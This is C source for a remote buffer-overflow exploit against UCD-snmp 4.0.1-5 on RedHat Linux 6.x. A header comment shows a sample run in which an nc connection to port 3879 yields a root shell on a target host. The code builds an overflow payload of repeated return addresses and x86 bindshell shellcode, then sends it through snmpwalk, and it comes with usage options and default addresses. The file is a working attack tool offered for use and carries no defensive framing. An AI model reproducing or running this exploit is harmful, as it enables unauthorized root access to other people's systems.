/* ** ** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit ** ** === Testing: ============================================================= ** ** [x82@xpl017elz x82]$ id ** uid=501(x82) gid=501(x82) groups=501(x82) ** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32 ** ** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit ** ** Exploit made by Xpl017Elz ** ** Shellcode Address: 0xbfffd710 ** Host: 61.xx.177.32 ** [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte ** Open Port: 3879 (Default) ** ** Timeout: No Response from 61.xx.177.32 ** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879 ** whoami; ** root ** pwd; ** /home/x82 ** id; ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm), ** 6(disk),10(wheel),503(secure) ** ** ========================================================================= ** ** exploit by "you dong-hun"(Xpl017Elz),. ** My World: http://x82.i21c.net ** */ #include #define DEFAULT 0 #define VALUES 112 #define HOST "127.0.0.1" #define DEFAULT_CODE 0xbfffd710 /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */ #define SNMPWALK "/usr/bin/snmpwalk" /* snmpwalk PATH */ main(int argc, char *argv[]) { char shellcode[] = /* Linux(x86) bindshell on port 3879 */ "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; char xOx[257], connect[100], host[] = HOST, snmpwalk[] = SNMPWALK; int count = DEFAULT, num_1 = DEFAULT, num_2 = DEFAULT, num_3 = DEFAULT, jobst = DEFAULT, values = VALUES; unsigned long shelladdr = DEFAULT_CODE; extern char *optarg; bzero(xOx, 257); banrl(); while ((jobst = getopt(argc, argv, "h:s:v:")) !=EOF) switch (jobst) { case 'h': strcpy(host, optarg); break; case 's': shelladdr = strtoul(optarg, NULL, 0); break; case 'v': values = atoi(optarg); break; case '?': usages(argv[0]); exit(0); } for(num_1 = 0; num_1 < (values / 4); num_1++) { xOx[count++] = (shelladdr >> 0) & 0xff; xOx[count++] = (shelladdr >> 8) & 0xff; xOx[count++] = (shelladdr >> 16) & 0xff; xOx[count++] = (shelladdr >> 24) & 0xff; } if((0x100 - values) < 0x00000082) { printf("\n - Values error. :-(\n\n"); printf(" Space that shellcode comes is so narrow.\n"); printf(" Compose exploit again.\n\n"); exit(0); } for(num_2 = 0; num_2 < (0x100 - values) - strlen(shellcode); num_2++) { xOx[count++] = '@'; } for(num_3 = 0; num_3 < strlen(shellcode); num_3++) { xOx[count++] = shellcode[num_3]; } printf(" Shellcode Address: %p\n", shelladdr); printf(" Host: %s\n", host); printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte ",values,256-values); printf("Open Port: 3879 (Default)\n\n"); execl(snmpwalk, "snmpwalk", host, xOx, NULL); } banrl() { printf("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n"); printf("\t\t Exploit made by Xpl017Elz\n\n"); } usages(char *var) { printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n",var); printf("\n option: -h - IP address & Domain name"); printf("\n -s - Shellcode Address"); printf("\n -v - &Shellcode Size\n\n"); printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n",var); }